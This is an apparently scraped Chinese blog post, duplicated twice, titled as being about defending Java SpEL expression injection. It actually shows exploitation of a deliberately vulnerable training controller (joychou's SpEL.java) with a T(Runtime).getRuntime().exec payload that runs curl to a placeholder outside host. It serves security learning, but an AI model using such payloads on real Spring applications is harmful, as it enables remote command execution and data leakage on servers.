Java SpEL表达式如何防范注入攻击?
- 内容介绍
- 文章标签
- 相关推荐
本文共计337个文字,预计阅读时间需要2分钟。
文章目录+ SpEL+ SpEL表达式注入+ SpEL安全主要了解那些对我们有用的东西+ 链接:https://www.jianshu.com/p/e0b50053b5d3+ 此外,我觉得其中最重点的是SpEL安全主要了解那些对我们有用的东西。
文章目录
- SpEL
- SpEL表达式注入
SpEL
我们学安全主要了解那些对我们有用的东西,在这里有一篇链接方便大家进行了解www.jianshu.com/p/e0b50053b5d3
此外,我觉得其中最重要的是通过 T() 调用一个类的静态方法,它将返回一个 Class Object,然后再调用相应的方法或属性:,并且如果包在java.lang下面可以省略这一部分,因此我们便可以利用此方法调用Runtime执行命令
SpEL表达式注入
在org/joychou/controller/SpEL.java下面,在这里获取get传入的expression参数,并对其进行解析
因此我们只需要构造
T(java.lang.Runtime).getRuntime().exec("curl xxx.xx.xx?a=Y4tacker")
简化一下就是
T(Runtime).getRuntime().exec("curl xxx.xx.xx?a=Y4tacker")
成功执行
本文共计337个文字,预计阅读时间需要2分钟。
文章目录+ SpEL+ SpEL表达式注入+ SpEL安全主要了解那些对我们有用的东西+ 链接:https://www.jianshu.com/p/e0b50053b5d3+ 此外,我觉得其中最重点的是SpEL安全主要了解那些对我们有用的东西。
文章目录
- SpEL
- SpEL表达式注入
SpEL
我们学安全主要了解那些对我们有用的东西,在这里有一篇链接方便大家进行了解www.jianshu.com/p/e0b50053b5d3
此外,我觉得其中最重要的是通过 T() 调用一个类的静态方法,它将返回一个 Class Object,然后再调用相应的方法或属性:,并且如果包在java.lang下面可以省略这一部分,因此我们便可以利用此方法调用Runtime执行命令
SpEL表达式注入
在org/joychou/controller/SpEL.java下面,在这里获取get传入的expression参数,并对其进行解析
因此我们只需要构造
T(java.lang.Runtime).getRuntime().exec("curl xxx.xx.xx?a=Y4tacker")
简化一下就是
T(Runtime).getRuntime().exec("curl xxx.xx.xx?a=Y4tacker")
成功执行